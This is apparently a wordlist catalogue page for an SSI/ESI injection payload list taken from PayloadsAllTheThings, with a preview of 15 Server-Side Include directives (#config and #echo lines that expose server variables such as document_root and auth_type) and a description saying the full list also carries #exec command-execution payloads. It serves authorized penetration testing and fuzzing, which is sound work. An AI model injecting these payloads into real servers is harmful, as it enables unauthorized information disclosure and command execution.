Skip to content
Fuzzing3.4 KB

SSI / ESI Injection (PayloadsAllTheThings)

Server-Side Includes (SSI) and Edge-Side Includes (ESI) injection payloads using #echo, #config, #exec directives for variable disclosure and command execution.

View source
Size
3.4 KB
Category
Fuzzing
Source
swisskyrepo/PayloadsAllTheThings
License
MIT
Recommended tools
burpwfuzznuclei

Preview

First 15 entries. Download or copy the full list (3.4 KB) using the buttons above.

>head ssi-esi-injection-patt.txt3.4 KB
<!--#config errmsg="File not found, informs users and password"-->
<!--#config timefmt="A %B %d %Y %r"-->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DOCUMENT_URI" -->
<!--#echo var="auth_type" -->
<!--#echo var="content_length" -->
<!--#echo var="content_type" -->
<!--#echo var="date_gmt" -->
<!--#echo var="date_local" -->
<!--#echo var="document_name" -->
<!--#echo var="document_root" -->
<!--#echo var="document_uri" -->
<!--#echo var="forwarded" -->
<!--#echo var="from" -->

Server-Side Includes (SSI) and Edge-Side Includes (ESI) injection payloads using #echo, #config, #exec directives for variable disclosure and command execution.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 3.4 KB and pairs well with tools such as burp, wfuzz, nuclei. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from swisskyrepo/PayloadsAllTheThings and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.